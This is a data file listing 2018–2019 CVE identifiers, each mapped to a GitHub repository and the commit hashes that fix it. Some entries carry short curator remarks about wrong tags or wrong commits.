-CVE-2018-17246;https://github.com/elastic/kibana;None:None;False;9b78cfd4b971df4852c77306e062ef0ccbf2186c,51aff7d3c49724fcbaba4353dff0cd7c3be799b0,22ba11eb525a2045d43307177081047f8a7a3dab,bc6a68529fc72b704b11871bfb11a51bdc724cbf; -CVE-2018-17419;https://github.com/miekg/dns;None:None;False;501e858f679edecd4a38a86317ce50271014a80d; my bad, wrong pick and they were inverted -CVE-2018-18074;https://github.com/psf/requests;None:None;False;3331e2aecdbf575dd60abef4df79c52d78610a83,c45d7c49ea75133e52ab22a8e9e13173938e36ff; -CVE-2018-18206;https://github.com/Bytom/bytom;None:None;False;a79fbcb71c138a499166c802d9f6af5c2ea18253,1ac3c8ac4f2b1e1df9675228290bda6b9586ba42; -CVE-2018-18389;https://github.com/neo4j/neo4j;None:None;False;46de5d01ae2741ffe04c36270fc62c6d490f65c9; -CVE-2018-18476;https://github.com/nedap/mysql-binuuid-rails;None:None;False;9ae920951b46ff0163b16c55d744e89acb1036d4; -CVE-2018-18854;https://github.com/spray/spray-json;None:None;False;855b35e6d65079085d580ab3063637d94c8f3e0a,c8e106fe41dad3916d54dcbf90e3aa5599d4d461; -CVE-2018-18893;https://github.com/HubSpot/jinjava;None:None;False;4f28830ef9883e2c4e2a92a0d37b93c8620de2f7,c13927db0fb7bb3b567469f125be8000f8cbf601; -CVE-2018-18926;https://github.com/go-gitea/gitea;None:None;False;aeb5655c25053bdcd7eee94ea37df88468374162,582213a858d936b4a55ad2416fd0615e78edc247,84829fba82741b5a0a882a9f1e95ea3651fc3ae7; vulnerable tag is fixed -CVE-2018-19048;https://github.com/mycolorway/simditor;None:None;False;ef01a643cbb7f8163535d6bfb71135f80ec6a6fd; -CVE-2018-19133;https://github.com/flarum/core;None:None;False;0536b208e1c31d5c9911d231413f2d1a66683f70,e99f7fcdace74211bec5627e6adf20ddf7dad2a7; -CVE-2018-19184;https://github.com/ethereum/go-ethereum;None:None;False;83e2761c3a13524bd5d6597ac08994488cf872ef; vulnerable tag is fixed -CVE-2018-19351;https://github.com/jupyter/notebook;None:None;False;4026ef01077d2e313a22b371fae2705196b8161d,107a89fce5f413fb5728c1c5d2c7788e1fb17491; -CVE-2018-19352;https://github.com/jupyter/notebook;None:None;False;288b73e1edbf527740e273fcc69b889460871648,ad25be985c55f66ef2105f712cb915708d568e29; -CVE-2018-19360;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; -CVE-2018-19361;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; -CVE-2018-19362;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; -CVE-2018-19370;https://github.com/Yoast/wordpress-seo;None:None;False;3bfa70a143f5ea3ee1934f3a1703bb5caf139ffa,3bc687351bc9a8c9c8c6bb8dbf048184075240a3; -CVE-2018-19620;https://github.com/star7th/showdoc;None:None;False;bcdb5e3519285bdf81e618b3c9b90d22bc49e13c,7e9f06c2f0cbbae55b0cfa0797fe2b4aae562443; -CVE-2018-19787;https://github.com/lxml/lxml;None:None;False;6be1d081b49c97cfd7b3fbd934a193b668629109; -CVE-2018-19992;https://github.com/Dolibarr/dolibarr;None:None;False;0f06e39d23636bd1e4039ac61a743c79725c798b; -CVE-2018-19993;https://github.com/Dolibarr/dolibarr;None:None;False;fc3fcc5455d9a610b85723e89e8be43a41ad1378; -CVE-2018-19994;https://github.com/Dolibarr/dolibarr;None:None;False;850b939ffd2c7a4443649331b923d5e0da2d6446; -CVE-2018-20000;https://github.com/Bedework/bw-webdav;None:None;False;ccb87c2757bab531c53faf0637ee342a378caa7f,cd51e67093ef7f01003878a44f31bc0b2a0d73d1,67283fb8b9609acdb1a8d2e7fefe195b4a261062; -CVE-2018-20028;https://github.com/contao/contao;None:None;False;bbe5fe1d385cd1195670e2d6b972272133443c59; -CVE-2018-20059;https://github.com/pippo-java/pippo;None:None;False;9f36e5891c0b11f840e1e1561ae96d83ba9ce759; -CVE-2018-20094;https://github.com/xuxueli/xxl-conf;None:None;False;e9ea78ccacd06539f75c083c47b3419cf985a8c0,7fa384e507b7eaa5821003211107e243e0d2b49c; -CVE-2018-20227;https://github.com/eclipse/rdf4j;None:None;False;099482e52f070a3d74e5ad368cff59c91e9b4f8a,df15a4d7a8f2789c043b27c9eafe1b30316cfa79; -CVE-2018-20433;https://github.com/swaldman/c3p0;None:None;False;7dfdda63f42759a5ec9b63d725b7412f74adb3e1; -CVE-2018-20594;https://github.com/hs-web/hsweb-framework;None:None;False;b72a2275ed21240296c6539bae1049c56abb542f; -CVE-2018-20595;https://github.com/hs-web/hsweb-framework;None:None;False;40929e9b0d336a26281a5ed2e0e721d54dd8d2f2; -CVE-2018-20677;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d; their commit is not correct (second one) -CVE-2018-20713;https://github.com/shopware/shopware;None:None;False;73cb46727050e28a0d7c2cf8471baaa3eaf2e5e8; -CVE-2018-20745;https://github.com/yiisoft/yii2;None:None;False;3317d26df0497c2f1a7f8fb9d1c668d911ab284f,2b6d1818783b103993873661c7736431b0a07604; -CVE-2018-20756;https://github.com/modxcms/revolution;None:None;False;4219e90f84e21f9cf4acc07ac926b5cde12731a4,b014e57624479b637586630a0376acc1e2be47c0,20049805dad576250185e4317c4ded1d21871219; -CVE-2018-20801;https://github.com/highcharts/highcharts;None:None;False;7c547e1e0f5e4379f94396efd559a566668c0dfa; -CVE-2018-20834;https://github.com/npm/node-tar;None:None;False;b0c58433c22f5e7fe8b1c76373f27e3f81dcd4c8,7ecef07da6a9e72cc0c4d0c9c6a8e85b6b52395d; -CVE-2018-20835;https://github.com/mafintosh/tar-fs;None:None;False;06672828e6fa29ac8551b1b6f36c852a9a3c58a2; -CVE-2018-20962;https://github.com/Laravel-Backpack/CRUD;None:None;False;8b6bd0a2d489a4690f6b1d7ace67e2f07f5f0cc6; -CVE-2018-20975;https://github.com/fatfreecrm/fat_free_crm;None:None;False;f2514212ae80781a9bbf7b6f4820f57d652a405f,4a57efa76ceb55c8fd8f1595f8d5c6946faa2307,346c5e0704926954e2e42f5a3c64628257a6315b,fe39b442722d9926229e325cf7a43b817bfa5a02,2f5c7fa22b085d2fe6e8aec066eb2f74c1403c1f,6d60bc8ed010c4eda05d6645c64849f415f68d65; -CVE-2018-1000013;https://github.com/jenkinsci/release-plugin;None:None;False;fe1660a5ebff2377b6a64214c6012e8615b3f81f; -CVE-2018-1000014;https://github.com/jenkinsci/translation-plugin;None:None;False;1287c8ead6adc891210b8b9fbc33f07adebf720d; -CVE-2018-1000060;https://github.com/sensu/sensu;None:None;False;46ff10023e8cbf1b6978838f47c51b20b98fe30b,44dc4263021782728c0d12b24f57c4cefd8e9360; -CVE-2018-1000088;https://github.com/doorkeeper-gem/doorkeeper;None:None;False;7b1a8373ecd69768c896000c7971dbf48948c1b5,90fe419eb72f20fb8d9a3b4ec9ff00e8f6d897c6,84fd4d03bced7d04ab2c68cecf26e838ae96faf4,39916a613b7dcc738aa38f7a17e1de9757bd0754; -CVE-2018-1000089;https://github.com/anymail/django-anymail;None:None;False;1a6086f2b58478d71f89bf27eb034ed81aefe5ef; -CVE-2018-1000096;https://github.com/brianleroux/tiny-json-http;None:None;False;1460a815c9a657daaf29ebdf085b935221fcf676,3c1e36d8bef3ef5fd8e4447f816d5ffe2bfc3190; vulnerable tag is fixed -CVE-2018-1000118;https://github.com/electron/electron;None:None;False;ce361a12e355f9e1e99c989f1ea056c9e502dbe7,92f4e5ea7d99c5a1b425c77c9c73ae360ea9f69c,0b7fd96629805e95014ac13c29f732dbd6837713; -CVE-2018-1000119;https://github.com/sinatra/sinatra;None:None;False;8aa6c42ef724f93ae309fb7c5668e19ad547eceb; -CVE-2018-1000129;https://github.com/rhuss/jolokia;None:None;False;5895d5c137c335e6b473e9dcb9baf748851bbc5f; -CVE-2018-1000134;https://github.com/pingidentity/ldapsdk;None:None;False;8471904a02438c03965d21367890276bc25fa5a6; the release commit contains the CVE ID just as reference, this is bs. Commit ID is in the advisory description -CVE-2018-1000159;https://github.com/tlsfuzzer/tlslite-ng;None:None;False;e5e9145558f4c1a81071c61c947aa55a52542585,3674815d1b0f7484454995e2737a352e0a6a93d8,cf1e82729f3bd44b9dd5d88a6f3a64c73b131889,ec5c61fae8b8eee0f62717091775f68d8161ca34; -CVE-2018-1000164;https://github.com/benoitc/gunicorn;None:None;False;1e10a02e73c87dfadc394b361af33864d0e59e24; -CVE-2018-1000518;https://github.com/aaugustin/websockets;None:None;False;b6a25ceb3555d0ba69e5961b8d7616e4c1aecb2b; -CVE-2018-1000525;https://github.com/flack/openpsa;None:None;False;097eae045cde6e59b063261cf7cdaa896d14ab39; -CVE-2018-1000531;https://github.com/FusionAuth/fusionauth-jwt;None:None;False;abb0d479389a2509f939452a6767dc424bb5e6ba; -CVE-2018-1000538;https://github.com/minio/minio;None:None;False;9c8b7306f55f2c8c0a5c7cea9a8db9d34be8faa7; -CVE-2018-1000539;https://github.com/nov/json-jwt;None:None;False;3393f394f271c87bd42ec23c300727b4437d1638,a3b2147f0f6d9aca653e7a30e453d3a92b33413f; -CVE-2018-1000559;https://github.com/qutebrowser/qutebrowser;None:None;False;5a7869f2feaa346853d2a85413d6527c87ef0d9f,4c9360237f186681b1e3f2a0f30c45161cf405c7; -CVE-2018-1000613;https://github.com/bcgit/bc-java;None:None;False;4092ede58da51af9a21e4825fbad0d9a3ef5a223,cd98322b171b15b3f88c5ec871175147893c31e6; -CVE-2018-1000620;https://github.com/hapijs/cryptiles;None:None;False;9332d4263a32b84e76bf538d7470d01ea63fa047; -CVE-2018-1000632;https://github.com/dom4j/dom4j;None:None;False;e598eb43d418744c4dbf62f647dd2381c9ce9387; -CVE-2018-1000644;https://github.com/eclipse/rdf4j;None:None;False;c412f4274a9b0a95fd4f2c26ce42b9800caf4f0a,50f2f51950227a4ec595a2922d81da487aba5135; fixed tag is vulnerable -CVE-2018-1000665;https://github.com/dojo/dojo;None:None;False;9e4b7252dc4fcfe6bed1e4e1081a05d2d0a5c53a,2e27f9ad62405dce64369cb0f7aeb5c64e873693,c15b3e7c215389a1474b2fa6565b112e3b9ffc0f,48cb00f29d8b87a5c006d237a39dcd5ec6c68fc5,595ea4e7a8da5960f29ecbe1320e755ea688797c,33eb767c477c6953446d9af8f5229d44d3dd8500,9117ffd5a3863e44c92fcd58564c0da22be858f4; -CVE-2018-1000803;https://github.com/go-gitea/gitea;None:None;False;194a11eb110cd98fc2ba52861abf7770db6885a3,99ce0bfcd7126ec0d82166c63865bde4d9d75d84; -CVE-2018-1000805;https://github.com/paramiko/paramiko;None:None;False;56c96a659658acdbb873aef8809a7b508434dcce; -CVE-2018-1000807;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; -CVE-2018-1000808;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; -CVE-2018-1000809;https://github.com/privacyidea/privacyidea;None:None;False;189312a99b499fe405fd3df5dd03a6b19ba66d46,a3edc09beffa2104f357fe24971ea3211ce40751; tracer wrong -CVE-2018-1000814;https://github.com/aio-libs/aiohttp-session;None:None;False;1b356f01bbab57d041c9a75bacd72fbbf8524728; -CVE-2018-1000820;https://github.com/neo4j-contrib/neo4j-apoc-procedures;None:None;False;e04325c48663994af0bab69a551ad64be2219708,45bc09c8bd7f17283e2a7e85ce3f02cb4be4fd1a; -CVE-2018-1000822;https://github.com/codelibs/fess;None:None;False;f68636939d479be650aaa90762c2a06b57ccc83f,4e0d9f5faaf4ec75dbe89f5ff97ece0f03b097a8,faa265b8d8f1c71e1bf3229fba5f8cc58a5611b7; -CVE-2018-1000843;https://github.com/spotify/luigi;None:None;False;1a5b64106e9182aca70b52b0c55d70c64d76f413; vulnerable tag is fixed -CVE-2018-1000850;https://github.com/square/retrofit;None:None;False;b9a7f6ad72073ddd40254c0058710e87a073047d; -CVE-2018-1000854;https://github.com/esigate/esigate;None:None;False;30cad23a8f282600c9b045e1af09f6f8a65357b1,8461193d2f358bcf1c3fabf82891a66786bfb540,b866acb1ebc661dbe475330e27e0d69693de1971; -CVE-2018-1000855;https://github.com/basecamp/easymon;None:None;False;a5deaf7359fc177fcf3fca725618b53619a30b7e,16b787030584857046ce2e81e60c811d55a015a6; -CVE-2018-1000872;https://github.com/OpenKMIP/PyKMIP;None:None;False;3a7b880bdf70d295ed8af3a5880bab65fa6b3932,06c960236bcaf6717fc5cf66cf8b5179804c5a05; -CVE-2018-1000888;https://github.com/pear/Archive_Tar;None:None;False;59ace120ac5ceb5f0d36e40e48e1884de1badf76; -CVE-2018-1002101;https://github.com/kubernetes/kubernetes;None:None;False;b2fb73ffead03d3d13f054b45867981bf2916976,46981ede3a65ac8a80abaeb6ccb480537bcb3d2d,914e404d3fc40d6c1d1d02abf2fd3ea0667f3fca,d65039c56ce4de5f2efdc38aa1284eeb95f89169,27bc865cc1bffb97d4dff38492aa9f830f859e45; -CVE-2018-1002102;https://github.com/kubernetes/kubernetes;None:None;False;50cf168e83f942f4850191c268461d07fcac19c7,d9aeea6ba4a52a4924050636c2205d007d4a507d,109b67c291de3b9bda35c35e471b9064de6ff859,4ee9f007cbc88cca5fa3e8576ff951a52a248e3c,e385ba8c4a0860746e661b39611c88aff5bee5f2,687c04c53006441ed40f4fa7c09a726cfcec380e; vulnerable tag is fixed -CVE-2018-1002105;https://github.com/kubernetes/kubernetes;None:None;False;4faa71170f4ba2d36e346ccc319b8405d807c657,753b2dbc622f5cc417845f0ff8a77f539a4213ea,0535bcef95a33855f0a722c8cd822c663fc6275e,637c7e288581ee40ab4ca210618a89a555b6e7e9,774585f773c7c591645f876e0a26155b7838debe,435f92c719f279a3a67808c80521ea17d5715c66,b84e3dd6f80af4016acfd891ef6cc50ce05d4b5b,2257c1ecbe3c0cf71dd50b82752ae189c94ec905; -CVE-2018-1002150;https://github.com/koji-project/koji;None:None;False;642bcb3bd9139aaedafe5b3600dd71a326c0026f,ab1ade75c155c2325ec92913fc5c510fd61757a1,84c0bde0cac42c3199d636ad934f852276f10975,4ea5849ff0cb9a1cc799de50b8573b0561dcfcef,5fbd954bfa883051d8cf7a294f965cb4f87dab83,8024d38f8766f95e7fd783b866966aaeffe5140e; Advisory does not mention 1.16, we find the correct backports -CVE-2018-1002200;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;f8f4233508193b70df33759ae9dc6154d69c2ea8,a1b58c0cccc4e9a2e4b06284254492b6ecf6033a,58bc24e465c0842981692adbf6d75680298989de; -CVE-2018-1002201;https://github.com/zeroturnaround/zt-zip;None:None;False;759b72f33bc8f4d69f84f09fcb7f010ad45d6fff; -CVE-2018-1002203;https://github.com/ZJONSSON/node-unzipper;None:None;False;2220ddd5b58f6252069a4f99f9475441ad0b50cd,5f68901c2e2e062a5e0083a81d257eccea0eb760; -CVE-2018-1002204;https://github.com/cthackers/adm-zip;None:None;False;6f4dfeb9a2166e93207443879988f97d88a37cde,62f64004fefb894c523a7143e8a88ebe6c84df25; -CVE-2018-1002205;https://github.com/haf/DotNetZip.Semverd;None:None;False;55d2c13c0cc64654e18fcdd0038fdb3d7458e366,8e79ed7dc17fe6d3c74c7ac1344b2aa60eb30039; -CVE-2018-1002207;https://github.com/mholt/archiver;None:None;False;e4ef56d48eb029648b0e895bb0b6a393ef0829c3; -CVE-2018-1002208;https://github.com/icsharpcode/SharpZipLib;None:None;False;5376c2daf1c0e0665398dee765af2047e43146ca; commit in reference is retrieved from a release and is a random wrong one -CVE-2018-1999024;https://github.com/mathjax/MathJax;None:None;False;a55da396c18cafb767a26aa9ad96f6f4199852f1; -CVE-2019-0194;https://github.com/apache/camel;None:None;False;53185f0b221b899aacb3c379647a866a8f408a87,68f2de31b7752bd49b7898d7098b3bfe8e0d0bdb,05ff65d5cebf1fa5172c59dd16359ed583c099ca,f337a98e86ef18611b14570e6780053fe3ddcc02,15a1f10fb532bdcba184cda17be602a2358bd5e8,5b64969d37cf2906efd4623cfd473041ce5132fd; -CVE-2019-0201;https://github.com/emperwang/zookeeper;None:None;False;5ff19e3672987bdde2843a3f031e2bf0010e35f1,af741cb319d4760cfab1cd3b560635adacd8deca; this repo has no tag -CVE-2019-0207;https://github.com/apache/tapestry-5;None:None;False;6dd7219fd4707467a36091e2f7f5f6460c619099; -CVE-2019-0210;https://github.com/apache/thrift;None:None;False;264a3f318ed3e9e51573f67f963c8509786bcec2,92c660f541fff657682f8239b6a995f3b71e6214; -CVE-2019-0219;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;686108484e6a7c1a316d7c6bc869c209c46d27e3; -CVE-2019-0226;https://github.com/apache/karaf;None:None;False;fe3bc4108e5a8b3c804e5da91ec0d5695588eb25,4155eac7dffa933f12c1e0cf18e9492ccc931093,bf5ed62d310f9042f9305dafac9a851464bb27cf; -CVE-2019-0228;https://github.com/apache/pdfbox;None:None;False;e5232887e684aeffc37ebb25ee8953e43d95c77c,be36ef01842885b556a4e7b40b5e2e8e7b1d2816; -CVE-2019-0911;https://github.com/chakra-core/ChakraCore;None:None;False;a2deba5e1850782014a2a34678464b251e448337; -CVE-2019-0912;https://github.com/chakra-core/ChakraCore;None:None;False;936a5af1c07e0fdec9aab85c05339dabe4aaeeb1; -CVE-2019-0917;https://github.com/chakra-core/ChakraCore;None:None;False;b5f8fad1b00087bd0a24cc173c2dfedc4f8aee33; -CVE-2019-0922;https://github.com/chakra-core/ChakraCore;None:None;False;a9ab1aae31078e80593b9227db11d316c2239ef3; -CVE-2019-0924;https://github.com/chakra-core/ChakraCore;None:None;False;6615113a09c0618ecc10e5680ffb978bf665641f; -CVE-2019-0925;https://github.com/chakra-core/ChakraCore;None:None;False;32ca10f3955f2a3ca56c6671c721b1264eca06b8; -CVE-2019-0933;https://github.com/chakra-core/ChakraCore;None:None;False;1a550c67b33b27675c0553152cabd09e4ffe3abf; -CVE-2019-1001;https://github.com/chakra-core/ChakraCore;None:None;False;75162b7f2d8ac2b37d17564e9c979ba1bae707e8,f8a6b80b4e5f7caeb7d3a61fe6836ebf69cfff85; -CVE-2019-1052;https://github.com/chakra-core/ChakraCore;None:None;False;66ab97c09c49c631234c0ec202b0822d0c2833cc; -CVE-2019-1062;https://github.com/microsoft/ChakraCore;None:None;False;7f0d390ad77d838cbb81d4586c83ec822f384ce8; -CVE-2019-1092;https://github.com/chakra-core/ChakraCore;None:None;False;d4e767fb946128c135d77edda7a794561e1c1f06; -CVE-2019-1103;https://github.com/chakra-core/ChakraCore;None:None;False;efab3101028045cbfa0cc21bd852f75bcc037dba; -CVE-2019-1106;https://github.com/chakra-core/ChakraCore;None:None;False;362e96537af207be3ecf7fa32f338229ee1dcc46; -CVE-2019-1107;https://github.com/chakra-core/ChakraCore;None:None;False;214dec9461f9acb9a4b9004368d2a81e0c125652; -CVE-2019-1139;https://github.com/microsoft/ChakraCore;None:None;False;ae8a8d9644e677a9878e5dd7824d4b876454e799; -CVE-2019-1195;https://github.com/microsoft/ChakraCore;None:None;False;c70af488e435ebd552f3da0547dee39dc8437a64; Same comment than CVE-2019-1197 (different fix commit) -CVE-2019-1196;https://github.com/microsoft/ChakraCore;None:None;False;dce7443ae45f82eceec3284974610e1a1bbe6792; Same comment than CVE-2019-1197 (different fix commit) -CVE-2019-1197;https://github.com/microsoft/ChakraCore;None:None;False;bf52b6cfa96d6395046d0aaf87396cd7ca13f6cb; It was easier to find the fix (bf52b6c) with google than the fixed version. -CVE-2019-1552;https://github.com/openssl/openssl;None:None;False;e32bc855a81a2d48d215c506bdeb4f598045f7e9,d333ebaf9c77332754a9d5e111e2f53e1de54fdd,b15a19c148384e73338aa7c5b12652138e35ed28,54aa9d51b09d67e90db443f682cface795f5af9e; -CVE-2019-3465;https://github.com/robrichards/xmlseclibs;None:None;False;8624602cce5175986ae5df87b6ea9596b742c7f9,46fa8b5a4fee597fece67773601e8b9dde7cb7df,118450a141ac2336be1b5e5e91a22229441b0277,0a53d3c3aa87564910cae4ed01416441d3ae0db5; -CVE-2019-3498;https://github.com/django/django;None:None;False;64d2396e83aedba3fcc84ca40f23fbd22f0b9b5b,1cd00fcf52d089ef0fe03beabd05d59df8ea052a,1ecc0a395be721e987e8e9fdfadde952b6dee1c7,9f4ed7c94c62e21644ef5115e393ac426b886f2e; -CVE-2019-3564;https://github.com/facebook/fbthrift;None:None;False;c461c1bd1a3e130b181aa9c854da3030cd4b5156; -CVE-2019-3772;https://github.com/spring-projects/spring-integration;None:None;False;59c69ed40d3755ef59f80872e0ea711adbb13620; -CVE-2019-3774;https://github.com/spring-projects/spring-batch;None:None;False;8dc3bb7d3c3d0b1487e3ef3dcbdebda865d2b20e,c7930184ee4513d548940550c4eb5eeef028cb64,a6d8ac1b44afeca1bb572718ceacac774a368422; -CVE-2019-3792;https://github.com/concourse/concourse;None:None;False;dc3d15ab6c3a69890c9985f9c875d4c2949be727; -CVE-2019-3799;https://github.com/spring-cloud/spring-cloud-config;None:None;False;3632fc6f64e567286c42c5a2f1b8142bfde505c2,9617f2922ee2ae27f08676716224933f0d869719,90e8a81f6fa921e034cecb79cd100f343f7714af,d3e21866a5f192fa2582349cb3732ad0e4b8850b; -CVE-2019-3808;https://github.com/moodle/moodle;None:None;False;cfde0b8d38061f370a5c21523c2188aca5a7160d,6360f87cdca744a6a71c315853f6d811a3e54e26,9ca8ccbefc3e1f56621c866f3af69bdb6cc98a15,3d2783690da2281e5e360c40961cd6846e1dbbb8; -CVE-2019-3810;https://github.com/moodle/moodle;None:None;False;14f9bad3cebf1aa6bb73be48020653e1f792dc29,2e057f082d622b09a33fd32aff3b4d275aed04dc; -CVE-2019-3826;https://github.com/prometheus/prometheus;None:None;False;b03d6f6eff8283bd7cb063edc21041d3fb6c9878; just CHANGELOG.md -CVE-2019-3847;https://github.com/moodle/moodle;None:None;False;a37e26d2efe1ca0e4d8d69c611a748af35b33674,070f24d006eab6b958eb083530de159b43c538ed,e836242e1c04cd62d0afa4a790074fd245628e7a,93dda3bfd3caaaa8d23fe8ede543f27ef774958d,ec3b63c772d6448765c68268234cf36c1a91bcac; -CVE-2019-3850;https://github.com/moodle/moodle;None:None;False;5d87464bc6283e72969cd251ce4f399aacebd608,d3f2f990dd3c5d4e6073a77154c6423d1c304647,907b377e51c32ea37feef53e10684b504e103273,1fc481dd7b09e08e85824c1fe6733b303a36bdce,772c908d40a944efd91d897d524b255626d330d4; -CVE-2019-3888;https://github.com/undertow-io/undertow;None:None;False;20cacc96c0594f4f4f9bb1cc2b93a77b6be3f74c,9bf05b765e222dd106fee9b46314061b18b7275e; was 2.0.20:2.0.21 -CVE-2019-3894;https://github.com/wildfly/wildfly;None:None;False;84975f8a4dd5f243c7ff5122c0d36783b116a0d7,936d0b0284288c837464229a255e2cdf1e10132d; -CVE-2019-5018;https://github.com/sqlite/sqlite;None:None;False;4ded26a53c4df312e9fd06facbbf70377e969983; repo was wrong wtf, only debian says the correct fixed version -CVE-2019-5413;https://github.com/expressjs/morgan;None:None;False;e329663836809de4be557b200a5b983ab8b4e6c2; -CVE-2019-5421;https://github.com/heartcombo/devise;None:None;False;36690f33a44a489e649022f0c56f41a38020414b,fb48336709bc1a29ff15b7170ed7b33906c66888,62703943bef75aba09ec3e346aba4c9159300ecd; -CVE-2019-5444;https://github.com/ChristoPy/serve-here.js;None:None;False;cefb51d03290b6a88dd13143ab2de31b8cf57c39; -CVE-2019-5448;https://github.com/yarnpkg/yarn;None:None;False;2f08a7405cc3f6fe47c30293050bb0ac94850932,c10ef6ab60f0bc80f65838d675325f6c17f04f24; -CVE-2019-5477;https://github.com/sparklemotion/nokogiri;None:None;False;5fe449fd3ab8cc25a71499128529c821c10dde83,daffe223967b74b3205513b5e600aa5dfefe687d,6777008202c1bde0520bb09fd1f02dee64dbcb60; -CVE-2019-5479;https://github.com/larvit/larvitbase-api;None:None;False;0e953337e75770abdcc0a8bb71932a44d2239514; -CVE-2019-5484;https://github.com/bower/bower;None:None;False;45c6bfa86f6e57731b153baca9e0b41a1cc699e3; -CVE-2019-5884;https://github.com/Studio-42/elFinder;None:None;False;f133163f2d754584de65d718b2fde96191557316; -CVE-2019-6798;https://github.com/phpmyadmin/phpmyadmin;None:None;False;469934cf7d3bd19a839eb78670590f7511399435; -CVE-2019-6802;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6,0284cb7f50b037688efdc4fb8de83878eedbe724; -CVE-2019-6975;https://github.com/django/django;None:None;False;0bbb560183fabf0533289700845dafa94951f227,83ab3e26647f6a50cdfac01ecf735cad540b2f35,40cd19055773705301c3428ed5e08a036d2091f3,1f42f82566c9d2d73aff1c42790d6b1b243f7676,402c0caa851e265410fbcaa55318f22d2bf22ee2; -CVE-2019-7164;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; -CVE-2019-7313;https://github.com/buildbot/buildbot;None:None;False;bdae9fea4e8978b19e12425776b2d083febd91a6,f0ccd5fd572ea8223b48bd57d8c2548b2f7d3ecf,e781f110933e05ecdb30abc64327a2c7c9ff9c5a; -CVE-2019-7537;https://github.com/pytroll/donfig;None:None;False;6332fa354f1c7d6fb126a0666be8f23adbc2fcf7,a57e36e14f32bfb48d8a1953b375ed22a35ef186; -CVE-2019-7548;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; -CVE-2019-7617;https://github.com/elastic/apm-agent-python;None:None;False;47286d746e05897c6b3af8d465aa56ab1ed8d678; -CVE-2019-7644;https://github.com/auth0/auth0-aspnet;None:None;False;69b0a09e2f3e350ca9f6cc2cc99d0219b4f248c1,870eb4b52696cf6e530b28e74f32167df35a3f12; this repo has no tag -CVE-2019-7722;https://github.com/pmd/pmd;None:None;False;e295711343cc155cb64ea0ae29ce9d69201469b3; -CVE-2019-8331;https://github.com/twbs/bootstrap;None:None;False;7bc4d2e0bc65151b6f60dccad50c9c8f50252bd6; -CVE-2019-8457;https://github.com/sqlite/sqlite;None:None;False;e41fd72acc7a06ce5a6a7d28154db1ffe8ba37a8; -CVE-2019-8903;https://github.com/totaljs/framework;None:None;False;de16238d13848149f5d1dae51f54e397a525932b,c37cafbf3e379a98db71c1125533d1e8d5b5aef7,4d7abbcdc34d6d1287338936f418c1eb1bc41201; -CVE-2019-9153;https://github.com/openpgpjs/openpgpjs;None:None;False;327d3e5392a6f59a4270569d200c7f7a2bfc4cbc,0be91133665e81d2007cdfa02cd3cf1d839ee4f1; -CVE-2019-9154;https://github.com/openpgpjs/openpgpjs;None:None;False;0be91133665e81d2007cdfa02cd3cf1d839ee4f1,47138eed61473e13ee8f05931119d3e10542c5e1; -CVE-2019-9155;https://github.com/openpgpjs/openpgpjs;None:None;False;1dd168e7a2ce6f9ba0fddf5d198e21baca9c042d; unknown tags -CVE-2019-9212;https://github.com/sofastack/sofa-hessian;None:None;False;285b071d89c8dac21d32983e54f3a8788ca34c12; -CVE-2019-9512;https://github.com/golang/go;None:None;False;5c379a437e904eb1f94296fa9d45276cd6e4f5a9,7139b45d1410ded14e1e131151fd8dfc435ede6c,145e193131eb486077b66009beb051aba07c52a5,e152b01a468a1c18a290bf9aec52ccea7693c7f2; This is a generic protocol vuln, it is not golang/go, check the advisory and re-run -CVE-2019-9658;https://github.com/checkstyle/checkstyle;None:None;False;180b4fe37a2249d4489d584505f2b7b3ab162ec6; -CVE-2019-9826;https://github.com/phpbb/phpbb;None:None;False;3075d2fecc9f5bb780bb478c0851a704c7f9b392,fd195fba210c8625e968ef5553e61864747c8d44,da9910850a168f73c6b8dd8407a01f47d27ca1d8,56060caa4c44620929b6e17fe4622343750ad302; -CVE-2019-9844;https://github.com/Khan/simple-markdown;None:None;False;8ad751f8333ce136d1a0a120d78596a30eb1e1d9; -CVE-2019-9942;https://github.com/twigphp/Twig;None:None;False;eac5422956e1dcca89a3669a03a3ff32f0502077,ad7d27425dffc763644de93da2262f69478c691b,0f3af98ef6e71929ad67fb6e5f3ad65777c1c4c5; -CVE-2019-10071;https://github.com/apache/tapestry-5;None:None;False;cdcf49c0a2b36ffc7a004d54405bb4357870c4b2; fixed tag is vulnerable -CVE-2019-10072;https://github.com/apache/tomcat;None:None;False;0bcd69c9dd8ae0ff424f2cd46de51583510b7f35,8d14c6f21d29768a39be4b6b9517060dc6606758,7f748eb6bfaba5207c89dbd7d5adf50fae847145,ada725a50a60867af3422c8e612aecaeea856a9a; -CVE-2019-10077;https://github.com/apache/jspwiki;None:None;False;87c89f0405d6b31fc165358ce5d5bc4536e32a8a; -CVE-2019-10086;https://github.com/apache/commons-beanutils;None:None;False;62e82ad92cf4818709d6044aaf257b73d42659a4,dd48f4e589462a8cdb1f29bbbccb35d6b0291d58; -CVE-2019-10089;https://github.com/apache/jspwiki;None:None;False;2956ccb307dd4b23b25c8ddeae8d7e7b301c6ff3; -CVE-2019-10090;https://github.com/apache/jspwiki;None:None;False;139746f7c25b84049437d1d9eed9456446a08bf7; -CVE-2019-10094;https://github.com/apache/tika;None:None;False;b8655aad5efaef1c5d266676350f58743770fb5b,426be73b9e7500fa3d441231fa4e473de34743f6,c4e63c9be8665cccea8b680c59a6f5cfbc03e0fc,81c21ab0aac6b3e4102a1a8906c8c7eab6f,1158d893dc952c573f7a12c7e4855cdce479fc2a,22ff7564f2641ba195f192d7c59e9df4a3a10747; -CVE-2019-10131;https://github.com/ImageMagick/ImageMagick;None:None;False;cb1214c124e1bd61f7dd551b94a794864861592e; 